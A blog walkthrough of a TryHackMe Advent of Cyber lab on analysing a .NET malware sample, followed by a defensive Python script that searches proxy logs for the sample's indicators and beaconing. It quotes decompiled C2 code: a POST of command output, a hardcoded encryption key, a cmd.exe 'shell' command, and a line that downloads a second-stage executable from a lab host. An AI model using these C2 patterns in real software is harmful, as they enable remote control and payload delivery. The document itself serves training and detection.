Hey, cyber enthusiasts! How are you doing, guys?
I’m in a great mood and ready to solve the challenges of the Advent of Cyber 2023.
TryHackMe has released the task for day 9 of the Advent of Cyber 2023. So here I am with its walkthrough.
Throughout this room, you will learn the foundations of analysing malware samples safely, the fundamentals of .NET binaries, the dnSpy tool for decompiling malware samples written in .NET, and building an essential methodology for analysing malware source code.
Malware, short for malicious software, is any program or code designed to cause harm to a computer system or its users. This broad category encompasses various types of harmful software with malicious intent. Malware is created by cybercriminals to gain unauthorized access, steal sensitive information, disrupt operations, or carry out other harmful activities. Viruses, Trojans, Worms, Spyware, Ransomware, Adware, etc. are just common types of malware.
Malware handling refers to the process of detecting, analyzing, containing, eradicating, and recovering from a malware infection. The goal of malware handling is to effectively respond to and neutralize the threat posed by malicious software. This process involves various steps, including detection, analysis, containment, eradication, and recovery.
Malware analysis is the process of inspecting, understanding, and dissecting malicious software, commonly known as malware, to gain insights into its functionality, behavior, and potential impact. The primary objectives of malware analysis are to identify the purpose of the malware, understand its methods of operation, and develop countermeasures to detect and mitigate its effects.
.NET binaries are executable files containing compiled code written in .NET languages like C#, VB.NET, and F#. They run on the .NET runtime environment, which provides the necessary libraries and services for the code to execute.
dnSpy is a free and open-source debugger and assembly editor specifically designed for the .NET Framework and .NET. It provides a comprehensive set of features for analyzing, debugging, and modifying .NET assemblies.
I have only given a brief introduction to each topic, because when you go through the room's own documentation you will see how well they have explained it, and repeating the same thing here would be a waste of time.
It’s my request to all readers to please go through their documentation. Don’t skip any part, because it’s very informative and useful. Now let’s quickly move on to the challenges. The first question is:
What HTTP User-Agent was used by the malware for its connection requests to the C2 server?
You can easily identify the user agent used by the malware in the ‘GetIt’ function of this malware.
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
What is the HTTP method used to submit the command execution output?
In the Main function of this malware, the ninth line submits the command output to the C2 server:
string str2 = Program.PostIt(url, data);
POST
What key is used by the malware to encrypt or decrypt the C2 data?
In both encryption and decryption functions, they have used the same key.
youcanthackthissupersecurec2keys
What is the first HTTP URL used by the malware?
In the fourth line of the Main function, you can see the base C2 address being set, and the first request goes to the HTTP URL http://mcgreedysecretc2.thm/reg:
string str = "http://mcgreedysecretc2.thm";
http://mcgreedysecretc2.thm/reg
How many seconds is the hardcoded value used by the sleep function?
In the main function, you will see that the Sleeper function is using the count variable, and the value of the count variable is 15,000 (ms), which is 15 seconds.
15
What is the C2 command the attacker uses to execute commands via cmd.exe?
We can see in the 32nd line of the Main function that it is using the shell command to execute commands via cmd.exe.
shell
What is the domain used by the malware to download another binary?
In the 43rd line of the Main function, you will see that the domain used by the malware to download another binary is stash.mcgreedy.thm:
string text2 = Program.Implant("http://stash.mcgreedy.thm/spykit.exe");
stash.mcgreedy.thm
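As an added, defender-side example that is not part of the room or of this write-up: the indicators recovered above (the User-Agent, the two hosts, the POST of command output and the 15-second sleep) turned into a small Python triage script that runs over proxy-log lines. The log layout and the sample lines are constructed for the example; the write-up names only the /reg path on the C2 host, so the constructed POSTs reuse it.

```python
import re
from datetime import datetime
from statistics import mean, pstdev
# Indicators recovered from the sample in the walkthrough above.
C2_USER_AGENT = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 "
                 "(KHTML, like Gecko) Version/17.0 Safari/605.1.15")
C2_HOST = "mcgreedysecretc2.thm"      # C2 host: /reg registration, POST of command output
STAGER_HOST = "stash.mcgreedy.thm"    # host serving the second-stage spykit.exe
SLEEP_SECONDS = 15                    # hardcoded Sleeper() value, 15000 ms
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')

def parse_log(lines):
    """Parse the hypothetical proxy-log layout: <ISO time> <src> <METHOD> <url> "<user-agent>"."""
    events = []
    for m in filter(None, map(LINE_RE.match, lines)):
        ts, src, method, url, ua = m.groups()
        host = re.sub(r"^https?://", "", url).split("/")[0]
        events.append({"ts": datetime.fromisoformat(ts), "src": src, "method": method, "host": host, "ua": ua})
    return events

def match_iocs(events):
    """Return (event, reasons) for each event that hits one of the static indicators."""
    checks = {"c2-user-agent": lambda e: e["ua"] == C2_USER_AGENT,
              "known-host": lambda e: e["host"] in (C2_HOST, STAGER_HOST),
              "command-output-post": lambda e: e["method"] == "POST" and e["host"] == C2_HOST}
    hits = []
    for ev in events:
        reasons = [name for name, check in checks.items() if check(ev)]
        if reasons:
            hits.append((ev, reasons))
    return hits

def beacon_pairs(events, period=SLEEP_SECONDS, tolerance=1.0):
    """Flag (src, host) pairs whose requests recur at roughly the hardcoded sleep interval."""
    stamps = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stamps.setdefault((ev["src"], ev["host"]), []).append(ev["ts"])
    flagged = []
    for pair, ts_list in stamps.items():
        gaps = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
        if len(gaps) >= 3 and abs(mean(gaps) - period) <= tolerance and pstdev(gaps) <= tolerance:
            flagged.append(pair)
    return flagged

# Constructed sample traffic: one host registers, beacons every 15 s and fetches the stager; one benign host.
SAMPLE_LOG = [f'2023-12-09T10:00:{s:02d} 10.0.0.5 {m} http://{C2_HOST}/reg "{C2_USER_AGENT}"'
              for s, m in ((0, "GET"), (15, "POST"), (30, "POST"), (45, "POST"))] + [
    f'2023-12-09T10:01:00 10.0.0.5 GET http://{STAGER_HOST}/spykit.exe "{C2_USER_AGENT}"',
    '2023-12-09T10:00:07 10.0.0.9 GET http://example.com/ "Mozilla/5.0 (Windows NT 10.0) Firefox/120.0"',
    '2023-12-09T10:00:40 10.0.0.9 GET http://example.com/news "Mozilla/5.0 (Windows NT 10.0) Firefox/120.0"']
```

The static checks catch the User-Agent and hosts from this sample only; the beacon check is what still fires if a variant changes those strings but keeps the fixed 15-second sleep.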
I kept this walkthrough straight to the point. I hope you guys find this useful. If you have any doubts, please connect with me on LinkedIn and feel free to get them resolved. And stay tuned for each day’s challenges and walkthroughs.
Check out our YouTube channel, Ethical Empire.
If you’re preparing for the CEH Practical Exam, don’t forget to check out our playlist, ‘CEH Practical Exam Preparation’.
Until next time, stay secure, stay curious, and keep exploring the fascinating world of cyber security.